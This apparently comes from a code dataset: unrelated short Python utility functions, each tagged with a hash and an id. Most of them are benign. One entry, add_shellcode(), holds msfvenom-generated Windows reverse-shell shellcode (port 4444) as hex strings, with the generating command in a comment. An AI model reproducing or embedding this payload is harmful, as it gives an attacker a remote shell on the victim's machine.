    # For consistent output, always expose entries for both nodes 0 and 1.
    if len(gen_attempts) == 0:
        gen_attempts = {0: {}, 1: {}}
    if len(gen_attempts) == 1:
        if 0 in gen_attempts:
            gen_attempts[1] = {}
        else:
            gen_attempts[0] = {}
    return gen_attempts
|
8138ce8cdea37dffb45b67e4f1c046ae25754d57
| 28,797
|
import json
def read_json_file(filename):
    """Read JSON file.

    Read JSON file as dictionary.

    Args:
        filename(str): Filename

    Returns:
        dict: Dictionary with file content

    Raises:
        Exception: If the file does not contain valid JSON; the message
            names the offending file.
    """
    with open(filename, 'r') as json_file:
        json_str = json_file.read()
    try:
        parsed_json = json.loads(json_str)
    except json.JSONDecodeError as err:
        # Fix: the message used a literal "(unknown)" placeholder instead of
        # the actual filename, making parse failures hard to trace.
        raise Exception(f"Could not read: {filename}; "
                        f"Error: {err}") from err
    return parsed_json
|
dbc7360d44bb964f1d59186806f552c844d311e1
| 28,798
|
def interpret_action(action, ins):
    """Interpret classifier class: return length of input to consume + output.

    Opcodes (first character of ``action``):
      R       -> consume 1, echo ``ins``
      D<n>    -> consume n, emit nothing (delete)
      C<text> -> consume len(text), emit text (copy)
      I<text> -> consume 0, emit text (insert)
    Unknown opcodes fall through and yield None, as in the original.
    """
    opcode, payload = action[0], action[1:]
    if opcode == 'R':
        return (1, ins)
    if opcode == 'D':
        return int(payload), ''
    if opcode == 'C':
        return len(payload), payload
    if opcode == 'I':
        return 0, payload
|
23cc2d14f6d49180cd6d680c266df12c95e2411f
| 28,800
|
def get_kit_application_list(kit_applicationTypes):
    """
    Translate application shortcut keywords and return all applications
    compatible with the kit as a list of UTF-8 encoded values.
    """
    expanded = kit_applicationTypes
    # "AMPS_ANY" is shorthand for the full family of AMPS applications.
    if "AMPS_ANY" in kit_applicationTypes.upper():
        expanded = kit_applicationTypes.replace("AMPS_ANY", "AMPS;AMPS_DNA_RNA;AMPS_EXOME;AMPS_RNA")
    return [entry.encode('UTF8') for entry in expanded.split(";")]
|
1c2f2e79901a68490176efd6dbc400f6ad083f7c
| 28,801
|
def FindFieldDefByID(field_id, config):
    """Find the field definition with the given ID, or return None."""
    return next((fd for fd in config.field_defs if fd.field_id == field_id), None)
|
b49766575864dac1d65a8a245827d00fcd345be1
| 28,802
|
import os
def get_supervisor_ip():
    """Return the supervisor ip address, or None when the SUPERVISOR
    environment variable is unset."""
    supervisor = os.environ.get("SUPERVISOR")
    if supervisor is None:
        return None
    # The value has the form "<ip>:<port>"; keep only the host part.
    return supervisor.partition(":")[0]
|
bf6bed7f858012c0d97d392bf775fb69c41b9ecd
| 28,803
|
import numpy as np
def bootstrap(original_data, statistic, num_resamples):
    """
    Bootstrap some data: compute ``statistic`` over ``num_resamples``
    resamples (with replacement, same size as the input) and return the
    results as a numpy array.
    """
    sample_size = len(original_data)
    stats = [
        statistic(np.random.choice(original_data, sample_size))
        for _ in range(num_resamples)
    ]
    return np.array(stats)
|
8604febd55fe14bd140ff4bc3849d06879589bb0
| 28,804
|
def get_section_length(data):
    """Gets the section length from the given section data.

    The 12-bit length is encoded as the low nibble of data[1] (high 4 bits)
    followed by data[2] (low 8 bits).
    """
    return ((data[1] & 0x0F) << 8) | data[2]
|
2e388ec7e11288fc22a284ebad1e478c0aadbc40
| 28,805
|
def _get_cmd_with_file(fn, algo, kernelonly=False):
"""
fn: file name of matrix
"""
cmd='./main -file=%s -algo=%s' % (fn, algo)
if kernelonly:
cmd = '%s -kernelonly=1'%cmd
if algo == 'mergepath' or algo == 'fixedrow4' or algo == 'fixedrow3':
cmd = '/home/shshi/downloads/merge-spmm/bin/gbspmm --iter 100 --mode %s %s' % (algo, fn)
return cmd
|
4cca3900b794f0f715851671ace6ee720db3e51b
| 28,807
|
def as_an_int(num1):
    """Returns the integer value of a number passed in.

    Propagates int()'s ValueError/TypeError for inputs that cannot be
    converted.
    """
    return int(num1)
|
32971d8def38efacb150ff511e400700f78c0907
| 28,808
|
def task_all():
    """Run all checks, then build the docs and release.

    Aggregate task (doit-style dict): no actions of its own — it only
    depends on the tox, docs and build tasks.
    """
    return {"actions": [], "task_dep": ["tox", "docs", "build"]}
|
6ac4fb358328894b608461572a4eac4258a33e7e
| 28,809
|
import json
def dump_json(obj, format='readable'):
    """Serialize ``obj`` to JSON.

    'readable' uses 4-space indentation; any other value produces the
    compact, parseable form with no indentation.
    """
    if format == 'readable':
        return json.dumps(obj, indent=4, separators=(',', ': '),
                          sort_keys=True)
    return json.dumps(obj, indent=None, separators=(',', ':'),
                      sort_keys=True)
|
2b6efb9202def6651bf4deb1ebc5e34f44c6c438
| 28,810
|
def format_element(eseq):
    """Format a sequence element using FASTA conventions (80-char lines).

    Args:
        eseq (string): element sequence.
    Return:
        string: the sequence split into lines of at most 80 characters.
    """
    width = 80
    chunks = [eseq[pos:pos + width] for pos in range(0, len(eseq), width)]
    return "\n".join(chunks)
|
1e492b341d5ecea3f44ac9fe7246964a98f016a7
| 28,811
|
def validate_reset_payload(new_user):
    """Validate a password-reset payload.

    Returns a (message, 400) tuple when either password field is the empty
    string; returns None (implicitly) when the payload passes validation.
    """
    # Old password must be provided.
    if new_user['current_password'] == '':
        return {'message': 'Old Password Cannot be empty'}, 400
    # New password must be provided.
    if new_user['new_password'] == '':
        return {'message': 'New Password Cannot be empty'}, 400
|
caa23eb60bb36e4acc163a618fdeaaace2da2945
| 28,812
|
from typing import List
def _calculate_german_iban_checksum(
iban: str, iban_fields: str = "DEkkbbbbbbbbcccccccccc"
) -> str:
"""
Calculate the checksum of the German IBAN format.
Examples
--------
>>> iban = 'DE41500105170123456789'
>>> _calculate_german_iban_checksum(iban)
'41'
"""
numbers: List[str] = [
value
for field_type, value in zip(iban_fields, iban)
if field_type in ["b", "c"]
]
translate = {
"0": "0",
"1": "1",
"2": "2",
"3": "3",
"4": "4",
"5": "5",
"6": "6",
"7": "7",
"8": "8",
"9": "9",
}
for i in range(ord("A"), ord("Z") + 1):
translate[chr(i)] = str(i - ord("A") + 10)
for val in "DE00":
translated = translate[val]
for char in translated:
numbers.append(char)
number = sum(int(value) * 10 ** i for i, value in enumerate(numbers[::-1]))
checksum = 98 - (number % 97)
return str(checksum)
|
dd9edcc1047caae8822d7a70f02d934db67504db
| 28,813
|
def readTpsLog(fn):
    """Read the log file at path ``fn`` and return its full contents.

    :param fn: path of the log file to read.
    :return: the entire file as one string.
    """
    # The original concatenated line by line with += (quadratic); a single
    # read() returns the identical string in one pass.
    with open(fn, "r") as f:
        return f.read()
|
01c882a0c3b6fd3deab38484616935b3cebe6046
| 28,815
|
def w_acoustic_vel(T,S,Z,lat):
    """ Calculate acoustic velocity of water dependent on water depth,
    temperature, salinity and latitude. After Leroy et al. (2008)
    J. Acoust. Soc. Am. 124(5). """
    # Polynomial fit in temperature T, salinity S, depth Z and latitude lat.
    # Assumes T in deg C, S in salinity units, Z in metres, lat in degrees --
    # TODO confirm units against Leroy et al. (2008). Kept as one expression
    # so the coefficients can be checked term-by-term against the paper.
    w_ac_vel = 1402.5 + 5 * T - 5.44e-2 * T**2 + 2.1e-4 * T**3 + 1.33 * S - 1.23e-2 * S * T + 8.7e-5 * S * T**2 + 1.56e-2 * Z + 2.55e-7 * Z**2 - 7.3e-12 * Z**3 + 1.2e-6 * Z * (lat - 45) - 9.5e-13 * T * Z**3 + 3e-7 * T**2 * Z + 1.43e-5 * S * Z
    return w_ac_vel
|
d1b8cac0c2bb65d76eb0125faf981a5b1ad1e31e
| 28,817
|
def find_service_by_type(cluster, service_type):
    """
    Find and return the first service of the given type.
    @type cluster: ApiCluster
    @param cluster: The cluster whose services are checked
    @type service_type: str
    @param service_type: the service type to look for
    @return ApiService or None if not found
    """
    matches = (s for s in cluster.get_all_services() if s.type == service_type)
    return next(matches, None)
|
fd04adce95c71499e17a143d7c94c0cf1aa603c9
| 28,818
|
def get_time_string(seconds):
    """Return ``seconds`` as a Slurm-compatible HH:MM:SS string.

    Hour values outside 0..99999 collapse to "00:00:00".
    """
    hours, remainder = divmod(seconds, 3600)
    minutes, secs = divmod(remainder, 60)
    if hours > 99999 or hours < 0:
        return "00:00:00"
    return "{:02d}:{:02d}:{:02d}".format(int(hours), int(minutes), int(secs))
|
6730744ab428dbcab0f7dfd8cf7c443e3ccfda1e
| 28,820
|
import os
def file_get_uniq_name(filename, max_iter=1000):
    """Return a unique file name by appending _1, _2, ... before the extension.

    Returns an empty string when no unique name is found in max_iter tries.
    """
    base, ext = os.path.splitext(filename)
    candidate = filename
    attempt = 1
    while attempt < max_iter and os.path.isfile(candidate):
        candidate = "{0}_{1}{2}".format(base, attempt, ext)
        attempt += 1
    return "" if attempt >= max_iter else candidate
|
7651026164ec04a6871dfae464dcf31891d6707c
| 28,822
|
def resolve_stack_name(source_stack_name, destination_stack_path):
    """
    Return a dependency stack's full name.

    A dependency stack can be named either by its full path (contains "/")
    or by its base name, in which case it is resolved relative to the
    environment of the source stack.

    :param source_stack_name: name of the stack whose parameter is resolved.
    :type source_stack_name: str
    :param destination_stack_path: full or short name of the dependency stack.
    :type destination_stack_path: str
    :returns: the dependency stack's full name.
    :rtype: str
    """
    if "/" not in destination_stack_path:
        base = source_stack_name.rsplit("/", 1)[0]
        return "/".join([base, destination_stack_path])
    return destination_stack_path
|
ffee297a7ce1f25cecd1832ced3c8dc9fd729e90
| 28,823
|
import os
import gzip
import io
def get_fastq_file_handle(fastq,mode='rt'):
    """Open a FASTQ file for reading and return the file handle.

    Handles both gzipped (must have a '.gz' extension) and uncompressed
    FASTQ files.

    Arguments:
      fastq: name (including path, if required) of the FASTQ file.
      mode: optional mode for file opening (defaults to 'rt').

    Returns:
      File handle usable for read operations.
    """
    _, ext = os.path.splitext(fastq)
    opener = gzip.open if ext == '.gz' else io.open
    return opener(fastq, mode)
|
ee3f710ce330e7e8a68eb407bda251ffd57e0b73
| 28,824
|
def get_induced_subgraph(graph, nodes):
    """Return the subgraph G[S] induced by ``nodes``: each node of S mapped
    to its neighbours restricted to S."""
    induced = {}
    for node in nodes:
        induced[node] = graph[node].intersection(nodes)
    return induced
|
58955db6d38dae86f24b756a6bfc67886300eaf5
| 28,826
|
def merge_two_lists(list_one, list_two):
    """
    Merge two sorted lists into a new sorted list.

    Input lists are not modified.

    :rtype: list
    :return: sorted merged list
    """
    merged = []
    i = j = 0
    # Two-pointer merge. The original popped from the front of copies
    # (list.pop(0) is O(n)), making the whole merge quadratic; indexing
    # keeps it O(n) and also avoids copying the inputs.
    # '<=' keeps the merge stable: ties are taken from list_one first.
    while i < len(list_one) and j < len(list_two):
        if list_one[i] <= list_two[j]:
            merged.append(list_one[i])
            i += 1
        else:
            merged.append(list_two[j])
            j += 1
    merged.extend(list_one[i:])
    merged.extend(list_two[j:])
    return merged
|
bd0bae58ad54725b55da64404b2635e71881907f
| 28,828
|
def filter_stories(stories, triggerlist):
    """
    Take a list of NewsStory instances and return only the stories for
    which at least one trigger in ``triggerlist`` fires.

    Fix: the original appended a story once per firing trigger, so a story
    matching several triggers appeared multiple times; each matching story
    now appears exactly once, in input order.
    """
    return [
        story for story in stories
        if any(trigger.evaluate(story) for trigger in triggerlist)
    ]
|
a91aa78452fb0a75753a0687a7938a565b2b87f0
| 28,829
|
def _hexint(string):
"""Convert argument to hex."""
return int(string, 16)
|
826722b30700d430a43702d1b5430638f4e96e54
| 28,830
|
def add_shellcode() -> bytes:
    """ Returns shellcode generated by msfvenom"""
    # msfvenom -p windows/shell_reverse_tcp lhost=eth0 lport=4444 -f hex EXITFUNC=thread -b "\x00"
    # NOTE(review): with `-f hex` msfvenom emits ASCII hex text, so these
    # fragments are hex characters, not raw machine code -- presumably the
    # caller hex-decodes the result before use; confirm at the call site.
    # Do not edit the payload bytes: any change breaks the encoded shellcode.
    shellcode = b""
    shellcode += b"bba862840bdbc5d97424f45a29c9b152"
    shellcode += b"315a1283eafc03f26c66fefe99e401fe"
    shellcode += b"5989881b6889ef68db397b3cd0b229d4"
    shellcode += b"63b6e5dbc47dd0d2d52e2075562d7555"
    shellcode += b"67fe8894a0e361c4796fd7f80e25e473"
    shellcode += b"5cab6c6015ca5d372d957db6e2ad37a0"
    shellcode += b"e7888e5bd367118d2d87bef0817abe35"
    shellcode += b"2565b54f5518ce9427c65b0e8f8dfcea"
    shellcode += b"31419a793d2ee82522b13d5e5e3ac0b0"
    shellcode += b"d678e714b2db860d1e8db74dc1721206"
    shellcode += b"ec672f45794b027579c315064b4c8e80"
    shellcode += b"e7050857073cecc7f6bf0dce3ceb5d78"
    shellcode += b"9494357819419928b53a5a9875eb32f2"
    shellcode += b"79d423fd537dc9043442a665a72ab569"
    shellcode += b"36f7308f52171518cb8e3cd26a4eeb9f"
    shellcode += b"adc41860632d547214dd2328b3e29944"
    shellcode += b"5f7046941669d1c37f5f28816dc682b7"
    shellcode += b"6f9eed73b463f37a39dfd76c87e053d8"
    shellcode += b"57b70db61161fc60c8de56e48d2c6972"
    shellcode += b"92781f9a23d566a58cb16edef0219035"
    shellcode += b"b142739fccea2a4a6d77cda1b28e4e43"
    shellcode += b"4b754e264e31c8db222abddb914b94"
    return shellcode
|
c77413d7d5f2e392916266cf91919475670e3f59
| 28,831
|
def filter(rec, labels):
    """Return a copy of ``rec`` keeping "file" plus only the detected-object
    labels that appear in ``labels``; return None when no label matches.

    NOTE: shadows the builtin ``filter`` (name kept for API compatibility).
    """
    matched = {label: rec[label] for label in labels if label in rec}
    if not matched:
        return None
    # "file" is inserted first to mirror the original record layout.
    result = {"file": rec["file"]}
    result.update(matched)
    return result
|
fbf3fe37721e2ed9e31ed734637615c937fa3461
| 28,832
|
def find_max(dictIn, keyIn):
    """Return a list of "key: value" strings for every maximum-valued entry
    of the inner mapping ``dictIn[keyIn]``."""
    inner = dictIn[keyIn]
    top = max(inner.values())
    return ["{}: {}".format(name, score)
            for name, score in inner.items() if score == top]
|
7a76c9793baad279b123cea6baba8fc61fa6ff54
| 28,835
|
def remove_namespace(tree):
    """
    Strip XML namespaces from all element tags in the tree, in place.

    e.g element.tag = '{http://schemas.microsoft.com/win/2004/08/events/event}System'
    becomes 'System'.

    :param tree: xml ElementTree Element
    :return: the same Element, with namespaces removed
    """
    # Element.getiterator() was removed in Python 3.9; iter() is the
    # long-standing replacement with identical traversal order.
    for element in tree.iter():
        tag = element.tag
        # Comment/PI nodes carry a callable tag rather than a str; skip
        # them explicitly instead of the original blanket bare `except`,
        # which also swallowed KeyboardInterrupt/SystemExit.
        if isinstance(tag, str) and tag.startswith('{'):
            element.tag = tag.split('}', 1)[1]
    return tree
|
b2f4431ffcd33b26321271ea55da24386c10adac
| 28,836
|
def check_eat_self(pos, snake):
    """Return False when ``pos`` collides with the snake's body (it eats
    itself), True otherwise."""
    return pos not in snake
|
0815373ab3e47b9bfaaadee96d20e4df6e20cae3
| 28,837
|
import logging
def setup_logger(name, log_file="log/dump.txt", log_level=logging.INFO):
    """Return a named logger that appends records to ``log_file`` at
    ``log_level``, with propagation to ancestor loggers disabled."""
    logger = logging.getLogger(name)
    handler = logging.FileHandler(log_file, mode='a')
    handler.setLevel(level=log_level)
    formatter = logging.Formatter(
        '%(asctime)s - %(name)s , %(levelname)s : %(message)s')
    handler.setFormatter(formatter)
    logger.addHandler(handler)
    logger.propagate = False
    return logger
|
35ff291a4295fac7463d4459308cb15dee12d36e
| 28,838
|
import os
def get_path_separator():
    r"""Return the file path separator for the current operating system.

    :return: String -- '\' on Windows (``os.name == 'nt'``), '/' on
        UNIX-like systems.
    """
    return '\\' if os.name == 'nt' else '/'
|
4a5b9947e6aef55d5dcda10317cbea9d210e7534
| 28,839
|
def elide_sequence(s, flank=5, elision="..."):
    """Replace the middle of ``s`` with ``elision``, keeping both flanks.

    Args:
        s (str): A sequence.
        flank (int, optional): Length of each kept flank. Defaults to five.
        elision (str, optional): Marker for the trimmed part. Defaults to '...'.

    Returns:
        str: ``s`` unchanged when eliding would not shorten it; otherwise the
        two flanks joined by ``elision``.

    Examples:
        >>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
        'ABCDE...VWXYZ'
        >>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ", flank=3)
        'ABC...XYZ'
        >>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ", flank=12)
        'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    """
    if len(s) <= 2 * flank + len(elision):
        return s
    return "".join((s[:flank], elision, s[-flank:]))
|
df318fec488dec46e0f99a0c035b0a962be59844
| 28,840
|
from typing import Mapping
def find_path(g: Mapping, src, dst, path=None):
    """Find a path from src to dst nodes in graph (depth-first, first found).

    >>> g = dict(a='c', b='ce', c='abde', d='c', e=['c', 'z'], f={})
    >>> find_path(g, 'a', 'c')
    ['a', 'c']
    >>> find_path(g, 'a', 'b')
    ['a', 'c', 'b']
    >>> find_path(g, 'a', 'z')
    ['a', 'c', 'b', 'e', 'z']
    >>> assert find_path(g, 'a', 'f') == None
    """
    # Fix: test None by identity. `path == None` invokes __eq__ on arbitrary
    # caller-supplied objects and is un-idiomatic (PEP 8).
    if path is None:
        path = []
    # Build a new list rather than mutating the caller's path.
    path = path + [src]
    if src == dst:
        return path
    if src not in g:
        return None
    for node in g[src]:
        if node not in path:  # avoid cycles
            extended_path = find_path(g, node, dst, path)
            if extended_path:
                return extended_path
    return None
|
ea3c48ef552b1393448c36579b11c5bc09c5cced
| 28,841
|
def get_reset_time(headers):
    """
    Read the rate-limit reset header (either spelling) as an int.

    Returns None when neither header is present or the value is not an
    integer string.
    """
    raw = headers.get("X-Rate-Limit-Reset")
    if raw is None:
        raw = headers.get("X-RateLimit-Reset")
    if raw is None:
        return None
    try:
        return int(raw)
    except ValueError:
        return None
|
f116b7606fa69628aa6078731f51872764c44f1b
| 28,842
|
import requests
def is_connected():
    """Verify whether network connectivity is up (up to 3 attempts).

    :returns: True if connected else False.
    """
    for _attempt in range(3):
        try:
            resp = requests.get("http://www.github.com/", proxies={}, timeout=3)
            resp.raise_for_status()
        except requests.exceptions.RequestException:
            continue
        return True
    return False
|
75df5621bce8133a3c667c0eef8178eb7c509628
| 28,844
|
import argparse
def create_parser(args):
    """Build the EagleVision command-line parser and parse ``args``.

    :param args: the argument list to parse (e.g. sys.argv[1:]).
    :return: the parsed argparse.Namespace.
    """
    parser = argparse.ArgumentParser(description='EagleVision')
    parser.add_argument(
        "--path",
        metavar="--p",
        type=str,
        help="Input file path",
    )
    return parser.parse_args(args)
|
2cbc71c96eb0a128f9ae044df0838eb82db3a98d
| 28,845
|
def standard_exception_view(self, request):
    """We want the webob standard responses for any webob-based HTTP exception.

    Applies to subclasses of :class:`webob.HTTPException`.

    :param request: the incoming request (unused; presumably required by the
        framework's view signature -- confirm against the view registration).
    :returns: ``self``, used directly as the response.
    """
    # webob HTTPException is a response already
    return self
|
cd7dbcf3118244a0ef338e0476e25f4c1d01dd8f
| 28,847
|
from typing import Any
from typing import Dict
def metadata(user_model: Any) -> Dict:
    """
    Ask the user model for its metadata.

    Parameters
    ----------
    user_model
        User defined class instance

    Returns
    -------
    The model's metadata dict, or an empty dict when the model does not
    define a ``metadata`` method.
    """
    if not hasattr(user_model, "metadata"):
        return {}
    return user_model.metadata()
|
6fa8df5a8d842c8fbccfa6d8447732da4263a124
| 28,848
|
def get_nuts_category(year):
    """
    Return the NUTS2 vintage name in force for ``year``.
    """
    # Vintages in descending order; the first one not newer than `year` wins.
    for vintage in (2016, 2013, 2010, 2006):
        if year >= vintage:
            return "nuts2_{}".format(vintage)
    return "nuts2_2003"
|
1f8ca85787065e4aa1455931a5a3cfec05baa5f0
| 28,849
|
import os
def collect_module_files(module_name, relative_path_in_module):
    """Return a list of tuples of (absolute_file_path, zip_target_path).

    Walks the installed module's directory (or a sub-directory of it when
    ``relative_path_in_module`` is non-empty) and pairs each file with its
    path relative to the module, prefixed by the module name.
    """
    module = __import__(module_name, globals(), locals(), [], 0)
    module_root = os.path.dirname(module.__file__)
    # An empty relative path means "walk the whole module directory".
    if relative_path_in_module:
        walk_root = module_root + '/' + relative_path_in_module
    else:
        walk_root = module_root
    collected = []
    for dirpath, _dirnames, filenames in os.walk(walk_root):
        for name in filenames:
            source = dirpath + '/' + name
            target = module_name + dirpath.replace(module_root, '') + '/' + name
            collected.append((source, target))
    return collected
|
c337d49827336a491e469d4e89433549c04b3ee4
| 28,850
|
def get_lr(optimizer):
    """
    ----------
    Author: Damon Gwinn
    ----------
    Hack to read the current learn rate of the model: returns the 'lr' of
    the optimizer's first param group (None when there are no groups).
    ----------
    """
    return next((group['lr'] for group in optimizer.param_groups), None)
|
e3989ecc8df9b02d52fd30f64a1c216c8cea58f4
| 28,851
|
def rgb_clamp(colour_value):
    """Clamp a value into the integer RGB range 0..255."""
    clamped = max(0, min(255, colour_value))
    return int(clamped)
|
f4dce9746fecd32cb432f03a056451a34d6f265a
| 28,852
|
import pyarrow
def _is_column_extension_type(ca: "pyarrow.ChunkedArray") -> bool:
    """Whether the provided Arrow Table column is an extension array, using an Arrow
    extension type.

    Args:
        ca: the chunked column whose type is inspected.

    Returns:
        True when the column's type is an instance of ``pyarrow.ExtensionType``.
    """
    return isinstance(ca.type, pyarrow.ExtensionType)
|
606c2fad0486df8f4995925021111eb1cb78f3c4
| 28,853
|
def Get_Desired_Values(i_rank, l_data):
    """Retrieve the desired values of the coin at index ``i_rank`` in the
    list returned by GetJSON()."""
    wanted_keys = (
        "rank",
        "name",
        "symbol",
        "price_btc",
        "price_usd",
        "price_eur",
        "market_cap_usd",
        "percent_change_1h",
        "percent_change_24h",
        "percent_change_7d",
    )
    coin = l_data[i_rank]
    return [coin[key] for key in wanted_keys]
|
3b81959420bf45f0c313d2ba24e1e3f0642e4b05
| 28,854
|
import re
def split_by_list(txt, seps):
    """
    Split ``txt`` on any of the given separators, keeping the separators.

    :param txt: text to be split
    :param seps: list of separators. NOTE(review): separators are joined
        into a regex without escaping, so regex metacharacters get regex
        semantics -- confirm callers only pass literal separators or rely
        on that.
    :return: list including the separators
    """
    pattern = "({})".format("|".join(seps))
    return re.split(pattern, txt)
|
9d91703d4954186b85b68bc6ec746fc417f335ca
| 28,855
|
def new_dict(key, value):
    """Construct a new dict.

    Parameters
    ----------
    key, value : TypeRef
        Key type and value type of the new dict.
    """
    # With JIT disabled, the type arguments are ignored and this pure-Python
    # fallback simply returns an empty dict.
    return {}
|
61a40b1b5009e87cfbdc5cd4197830dde0abf4f9
| 28,859
|
def construct_yaml_fields(signatures, function_operation_id_root,
                          file_operation_id_root, server_root_url):
    """
    Parse the signatures of functions to a dictionary that is used to generate yaml files.

    For each class in ``signatures`` this emits one entry for the constructor
    and one per (non-property) member, numbered by a running counter, e.g.:

    f = {0: {'name': 'linear-regression',
        'request_method': 'post',
        'doc_string': 'this is a doc string',
        'operation_id': 'cloudmesh.linear_regression',
        'paras': {
            'file_name': {'name': 'file_name', 'type': 'string'},
            'intercept': {'name': 'intercept', 'type': 'int'}
        }}}

    Returns a dict with 'header' (server url), 'functions' (the table above)
    and 'files' (the file operation id root).
    """
    table_yaml = {}
    count = 0
    for i, class_i in signatures.items():
        # build the yaml information table for class constructor
        count += 1
        class_i_name = class_i['class_name']
        constructor_yaml_info = {}
        constructor_yaml_info['name'] = class_i_name + '_constructor'
        constructor_yaml_info['request_method'] = 'post'
        constructor_yaml_info['doc_string'] = 'this is a doc string'
        constructor_yaml_info['operation_id'] = function_operation_id_root + '.' + \
            class_i_name + '_constructor'
        constructor_yaml_info['paras'] = {}
        for init_para_name, init_para_type in class_i['constructor'].items():
            constructor_yaml_info['paras'][init_para_name] = {
                'name': init_para_name, 'type': init_para_type}
        table_yaml[count] = constructor_yaml_info
        # build the yaml information table for class members
        for member_name, parameters in class_i['members'].items():
            # NOTE(review): the counter advances even for skipped 'property'
            # members, leaving gaps in the numbering -- confirm intentional.
            count += 1
            if (member_name != 'property'):
                member_yaml_info = {}
                member_yaml_info['name'] = class_i_name + '_' + member_name
                member_yaml_info['request_method'] = 'post'
                member_yaml_info['doc_string'] = 'this is a doc string'
                member_yaml_info['operation_id'] = function_operation_id_root + '.' + \
                    class_i_name + '_' + member_name
                member_yaml_info['paras'] = {}
                for member_para_name, member_para_type in parameters.items():
                    member_yaml_info['paras'][member_para_name] = {
                        'name': member_para_name, 'type': member_para_type}
                table_yaml[count] = member_yaml_info
    res = {'header': {'server_url': server_root_url},
           'functions': table_yaml,
           'files':{'operation_id':file_operation_id_root}
           }
    return res
|
a7c52279eb9900aa415ba75838b3af63d1f8a94a
| 28,861
|
import logging
def __logger():
    """Retrieves the module-level logger object."""
    # logging.getLogger caches loggers by name, so repeated calls return
    # the same logger instance.
    return logging.getLogger(__name__)
|
ef580617dcf54f2767fdeb471d97b70e1d222105
| 28,863
|
import string
import random
def generate_password(length: int) -> str:
    """Return a random password of ``length`` alphanumeric characters.

    NOTE: uses ``random``, which is not cryptographically secure; prefer the
    ``secrets`` module for security-sensitive tokens.
    """
    alphabet = string.ascii_letters + string.digits
    # join is linear; the original character-by-character `+=` loop was
    # quadratic in `length`.
    return "".join(random.choices(alphabet, k=length))
|
3ef64b60ea893fe37aad5ca41cad6f1363f48412
| 28,864
|
def build_geometry(self):
    """Compute the curve (Line) list needed to plot the Slot.

    Parameters
    ----------
    self : SlotM17
        A SlotM17 object

    Returns
    -------
    curve_list: list
        Empty list (no lamination, only active surface)
    """
    return []
|
a56a4f90b5b6677f5b74ba11694818604543c352
| 28,866
|
def overlaps(a, b):
    """Return True if two circles are overlapping (touching counts).

    Usually you will want the 'collides' method instead, but this one is
    useful for checking whether the player entered an area or hit a
    stationary object. Objects without a ``radius`` attribute default to 0.5.
    """
    dx = a.x - b.x
    dy = a.y - b.y
    try:
        combined = a.radius + b.radius
    except AttributeError:
        combined = getattr(a, 'radius', 0.5) + getattr(b, 'radius', 0.5)
    # Compare squared distances to avoid a sqrt.
    return dx ** 2 + dy ** 2 <= combined ** 2
|
d7d1a5e110415895f5891a9c14124d50a5b68f69
| 28,867
|
def wrap_it_in_a_link(html, url):
    """ Wrap a link around some arbitrary html
    Parameters:
        html - the html around which to wrap the link
        url - the URL to link to
    Returns:
        The same html but with a link around it
    """
    return "<a href='{}'>{}</a>".format(url, html)
|
606ca401982a4f5474e03063e26e402e690557fc
| 28,871
|
def mostVisited(node):
    """
    Instead of determining the best child via the selection formula again,
    return the most visited node as the best next action. The difference
    between this approach and the bestChild() approach is not large.
    (source: http://ccg.doc.gold.ac.uk/ccg_old/papers/browne_tciaig12_1.pdf)

    NOTE(review): despite the name, the selection key below is
    ``total_sim_reward``, not ``visit_count`` -- confirm this is intentional.
    """
    child = node.children
    mostV = max(child, key=lambda x: x.total_sim_reward)
    print(f'Visit count: {mostV.visit_count}. Total reward: {mostV.total_sim_reward}')
    return mostV
|
441e8968ddf5a80a0a3cca610f9e5dcb86722ed4
| 28,872
|
def is_even(number: int):
    """Return True when ``number`` is even, False when odd."""
    return (number & 1) == 0
|
0fe6ff55e5a84caedda3523bad02b8d144ab0657
| 28,873
|
def merge_tfds(*terms_d):
    """Merge term-frequency dictionaries.

    Takes any number of term->frequency dicts and returns a single dict
    mapping each term to the sum of its frequencies across all input dicts.
    """
    merged = {}
    # Accumulate directly instead of flattening every dict into an
    # intermediate list and re-scanning it by index, as the original did.
    for term_dict in terms_d:
        for term, freq in term_dict.items():
            merged[term] = merged.get(term, 0) + freq
    return merged
|
9f36206a77795fd471566819b4a5b5ddaeddaaf9
| 28,874
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.